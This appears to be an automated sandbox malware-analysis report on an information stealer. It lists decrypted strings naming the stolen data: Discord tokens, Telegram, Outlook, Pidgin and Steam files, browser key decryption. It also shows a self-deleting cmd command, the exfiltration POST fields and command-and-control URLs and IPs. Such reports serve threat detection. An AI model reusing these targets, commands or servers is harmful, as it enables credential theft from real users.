                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: \discord\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: \Local Storage\leveldb
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: \Telegram Desktop\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: key_datas
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: D877F783D5D3EF8C*
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: map*
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: A7FDF864FBC10B77*
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: A92DAA6EA6F891F2*
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: F8806DD0C461824F*
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Telegram
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Tox
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: *.tox
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: *.ini
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Password
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: 00000001
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: 00000002
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: 00000003
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: 00000004
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: \Outlook\accounts.txt
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Pidgin
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: \.purple\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: accounts.xml
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: dQw4w9WgXcQ
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: token:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Software\Valve\Steam
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SteamPath
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: \config\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: ssfn*
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: config.vdf
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: DialogConfig.vdf
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: libraryfolders.vdf
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: loginusers.vdf
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: \Steam\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: done
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: soft
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: \Discord\tokens.txt
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: https
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: POST
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: HTTP/1.1
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Content-Disposition: form-data; name="
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: hwid
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: build
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: token
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: file_name
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: file
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: message
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: screenshot.jpg
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4BA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,2_2_6C4BA9A0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4B4440 PK11_PrivDecrypt,2_2_6C4B4440
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C484420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,2_2_6C484420
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4B44C0 PK11_PubEncrypt,2_2_6C4B44C0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C5025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,2_2_6C5025B0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4BA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,2_2_6C4BA650
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C498670 PK11_ExportEncryptedPrivKeyInfo,2_2_6C498670
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C49E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,2_2_6C49E6E0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4DA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,2_2_6C4DA730
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4E0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,2_2_6C4E0180
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4B43B0 PK11_PubEncryptPKCS1,PR_SetError,2_2_6C4B43B0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4D7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,2_2_6C4D7C00
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C497D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,2_2_6C497D60
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4DBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,2_2_6C4DBD30
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4D9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,2_2_6C4D9EC0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4B3FF0 PK11_PrivDecryptPKCS1,2_2_6C4B3FF0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4B9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,2_2_6C4B9840
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4B3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,2_2_6C4B3850
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4DDA40 SEC_PKCS7ContentIsEncrypted,2_2_6C4DDA40
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4B3560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,2_2_6C4B3560

                                      Phishing

                                      barindex
                                      Yara detected obfuscated html page
                                      Source: Yara matchFile source: C:\Temp\.gif, type: DROPPED
                                      Source: Yara matchFile source: C:\Temp\random.hta, type: DROPPED
                                      Source: Yara matchFile source: C:\Temp\QZ7iCUD92.txt, type: DROPPED
                                      Source: Yara matchFile source: C:\Temp\8tA3oGhlP.txt, type: DROPPED
                                      Source: Yara matchFile source: C:\Temp\NLqFjPikt.txt, type: DROPPED
                                      Source: 5EfYBe3nch.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      Source: Binary string: mozglue.pdbP source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2299017750.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
                                      Source: Binary string: ntkrnlmp.pdbx, source: iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEC000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: nss3.pdb@ source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                      Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEF000.00000004.00000020.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEC000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: ntkrnlmp.pdb source: iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEF000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\Users\Dan\source\repos\gamee\gamee\obj\Debug\gamee.pdb source: eXbhgU9.exe, 00000011.00000000.2472309641.00000000008D2000.00000002.00000001.01000000.00000011.sdmp
                                      Source: Binary string: nss3.pdb source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                      Source: Binary string: mozglue.pdb source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2299017750.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                                      Software Vulnerabilities

                                      barindex
                                      Suspicious execution chain found
                                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                                      Source: chrome.exeMemory has grown: Private usage: 18MB later: 41MB

                                      Networking

                                      barindex
                                      C2 URLs / IPs found in malware configuration
                                      Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
                                      Source: Malware configuration extractorURLs: nearycrepso.shop
                                      Source: Malware configuration extractorURLs: rabidcowse.shop
                                      Source: Malware configuration extractorURLs: cloudewahsj.shop
                                      Source: Malware configuration extractorURLs: wholersorie.shop
                                      Source: Malware configuration extractorURLs: framekgirus.shop
                                      Source: Malware configuration extractorURLs: abruptyopsn.shop
                                      Source: Malware configuration extractorURLs: noisycuttej.shop
                                      Source: Malware configuration extractorURLs: tirepublicerj.shop
                                      Source: Malware configuration extractorURLs: fancywaxxers.shop
                                      Source: Malware configuration extractorIPs: 185.215.113.43
                                      Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                                      Source: Joe Sandbox ViewIP Address: 1.1.1.1 1.1.1.1
                                      Source: Joe Sandbox ViewIP Address: 1.1.1.1 1.1.1.1
                                      Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C46CC60 PR_Recv,2_2_6C46CC60
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/L
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exeZ
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exev
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeX
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16:80/mine/random.exeD
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://185.215.113.206
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllNQM
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllnPm
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php-S0
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpET
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2294056089.000000000B4FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpY
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpiS
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpmT
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpyD
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php~
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://185.215.113.206ones
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                                      Source: powershell.exe, 00000014.00000002.2543676458.0000000003165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                                      Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                                      Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.comd
                                      Source: powershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                                      Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                                      Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.comd
                                      Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2546675216.0000000005011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
